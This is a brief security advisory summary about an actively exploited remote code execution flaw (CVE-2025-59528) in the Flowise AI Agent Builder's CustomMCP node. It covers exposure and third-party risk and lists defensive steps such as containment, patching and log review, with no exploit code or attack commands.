Critical RCE (CVE‑2025‑59528) in Flowise AI Agent Builder Actively Exploited, 12,000+ Deployments Exposed
What It Is – Flowise, an open‑source AI “Agent Builder” platform, contains a critical code‑injection flaw (CVE‑2025‑59528) that enables unauthenticated remote code execution. The vulnerability scores a perfect CVSS 10.0 and is being leveraged by threat actors in the wild.
Exploitability – Public exploit code and proof‑of‑concepts have been released; multiple threat‑intel feeds confirm active exploitation against live deployments.
Affected Products – Flowise AI Agent Builder (all versions prior to the forthcoming patch). The flaw resides in the CustomMCP node, which processes user‑supplied configuration data.
TPRM Impact – Organizations that have integrated Flowise into internal workflows, SaaS offerings, or customer‑facing AI services face a direct supply‑chain risk. Compromise of a single instance can lead to lateral movement, data exfiltration, or ransomware deployment across the vendor’s ecosystem.
Recommended Actions –
- Immediate containment – Disconnect all Flowise instances from the internet and block inbound traffic to the CustomMCP endpoint.
- Patch/upgrade – Apply the vendor‑released hot‑fix (or upgrade to the latest version) that sanitises the configuration parser.
- Asset inventory – Conduct a rapid sweep to identify every Flowise deployment (including on‑prem, cloud, and containerised instances).
- Log review – Search for anomalous command execution, new processes, or outbound connections originating from the CustomMCP node.
- Third‑party assessment – Notify any downstream partners that consume services built on Flowise and request evidence of remediation.
- Future hardening – Enforce least‑privilege execution contexts for AI agents and implement network segmentation for AI workloads.
Source: The Hacker News – Flowise AI Agent Builder Under Active CVSS 10.0 RCE Exploitation